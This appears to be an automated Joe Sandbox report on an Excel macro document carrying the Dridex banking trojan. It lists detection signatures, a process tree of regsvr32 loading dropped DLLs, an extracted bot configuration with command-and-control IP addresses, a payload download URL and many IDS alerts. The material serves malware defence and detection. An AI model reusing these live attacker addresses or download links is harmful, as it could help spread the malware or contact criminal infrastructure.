Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report sample20210113-01.xlsm

Overview

General Information

Sample Name:sample20210113-01.xlsm
Analysis ID:339173
MD5:b777540ad31de24618cb9818debb2fd4
SHA1:6e18fab506aefe0e1d1bdbb7bf61963075a4db61
SHA256:39c47b42df4d66fe9b9e4cb03f486a6a8a11770010dd6537c55d2899b2e2021a
Tags:Dridexxlsm

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Dridex
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query network adapater information
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Is looking for software installed on the system
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2448 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2540 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 1100 cmdline: -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 1296 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2808 cmdline: -s C:\Users\user\AppData\Local\Temp\ndrztpo.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • regsvr32.exe (PID: 2832 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jvkhmoba.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 3", "221.126.244.72:443", "195.231.69.151:3889", "157.7.166.26:5353"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: BlueMashroom DLL LoadShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2448, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., ProcessId: 2540
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2448, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., ProcessId: 2540
Sigma detected: Regsvr32 AnomalyShow sources
Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2448, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\pgjasrqd.dll., ProcessId: 2540

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Found malware configurationShow sources
Source: 4.2.regsvr32.exe.bf0000.0.raw.unpackMalware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 10444", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 3", "221.126.244.72:443", "195.231.69.151:3889", "157.7.166.26:5353"]}
Multi AV Scanner detection for domain / URLShow sources
Source: http://bipolarmalta.mccarthy.ws/lpxtpiw.zipVirustotal: Detection: 6%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: sample20210113-01.xlsmVirustotal: Detection: 25%Perma Link
Source: sample20210113-01.xlsmReversingLabs: Detection: 10%
Machine Learning detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\ndrztpo.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\pgjasrqd.dllJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\dyu828kp[1].rarJoe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lpxtpiw[1].zipJoe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49170 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49181 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49182 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49187 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49193 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49194 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49199 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49205 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49206 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49211 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49217 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49218 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49223 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49225 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49229 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49235 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49236 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49241 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49247 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49248 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49253 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49259 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49260 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49265 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49271 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49272 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49277 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49283 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49284 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49289 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49295 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49296 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49301 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49307 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49308 version: TLS 1.2
Source: unknownHTTPS traffic detected: 221.126.244.72:443 -> 192.168.2.22:49313 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_00CDCEF8 FindFirstFileExW,
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_004ECEF8 FindFirstFileExW,

Software Vulnerabilities:

barindex
Document exploit detected (creates forbidden files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\pgjasrqd.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\ndrztpo.dllJump to behavior
Document exploit detected (drops PE files)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: lpxtpiw[1].zip.0.drJump to dropped file
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficDNS query: name: bipolarmalta.mccarthy.ws
Source: global trafficTCP traffic: 192.168.2.22:49167 -> 221.126.244.72:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 35.214.225.210:80

Networking:

barindex
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49167
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49170
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49171
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49173
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49175
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49177
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49176
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49179
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49181
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49183
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49182
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49185
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49187
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49188
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49189
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49191
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49193
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49194
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49195
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49197
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49199
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49200
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49201
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49203
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49205
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49206
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49207
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49209
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49211
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49213
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49212
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49215
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49217
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49219
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49218
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49221
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49223
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49224
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49225
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49227
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49229
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49231
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49230
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49233
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49235
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49237
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49236
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49239
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49241
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49243
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49242
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49245
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49247
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49249
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49248
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49251
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49253
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49255
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49254
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49257
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49259
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49261
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49260
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49263
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49265
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49267
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49266
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49269
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49271
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49273
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49272
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49275
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49277
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49279
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49278
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49281
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49283
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49285
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49284
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49287
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49289
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49291
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49290
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49293
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49295
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49297
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49296
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49299
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49301
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 195.231.69.151:3889 -> 192.168.2.22:49303
Source: TrafficSnort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 221.126.244.72:443 -> 192.168.2.22:49302
